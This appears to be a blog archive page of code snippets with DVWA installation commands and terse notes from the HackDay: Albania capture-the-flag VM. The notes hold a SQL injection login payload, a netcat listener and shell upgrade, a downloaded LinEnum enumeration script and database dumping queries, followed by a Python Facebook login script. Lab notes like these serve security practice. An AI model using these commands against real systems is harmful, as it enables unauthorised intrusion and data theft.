Arşivler: Gistpens

A collection of code snippets.

DVWA – Kurulum

docker run --rm -it -p 80:80 vulnerables/web-dvwa
apt-get -y install apache2 mysql-server php php-mysqli php-gd libapache2-mod-php
service apache2 start
service mysql start
DVWA System error - config file not found. Copy config/config.inc.php.dist to config/config.inc.php and configure to your environment.
cd /var/www/html/dvwa/config/
cp config.inc.php.dist config.inc.php

HackDay: Albania

username=test' RLIKE SLEEP(0)-- qxYr&password=login
netcat -lvnp 1234
python3.5 -c 'import pty;pty.spawn("/bin/bash")'
cd /tmp
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh
show databases
use bank_database
show tables; SELECT * FROM klienti; SELECT * FROM tickets;
import mechanize
br=mechanize.Browser()
br.set_handle_robots(False)
#br.set_cookie("cookie data")
#br.addheaders = [("Referer", "http://website.com")]
#br.set_proxy("ipadress:port","http")
br.addheaders=[('User-agent', "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36")]
op=br.open("https://facebook.com")
dos=open("c:\\users\\user\\desktop\\facebook.txt","w+")
username=raw_input("enter your facebook username: ")
password=raw_input("enter your facebook password: ")
br.select_form(nr=0)
br.form["email"]=username
br.form["pass"]=password
br.method="POST"
br.submit()
dos.write(br.open("https://facebook.com").read())
dos.seek(0)
text=dos.read().decode("UTF-8")
if(text.find("home_icon",0,len(text))!=-1):
 print "success login."
else:
 print "error login."
dos.close()
import mechanize
for i in dir(mechanize):
    print i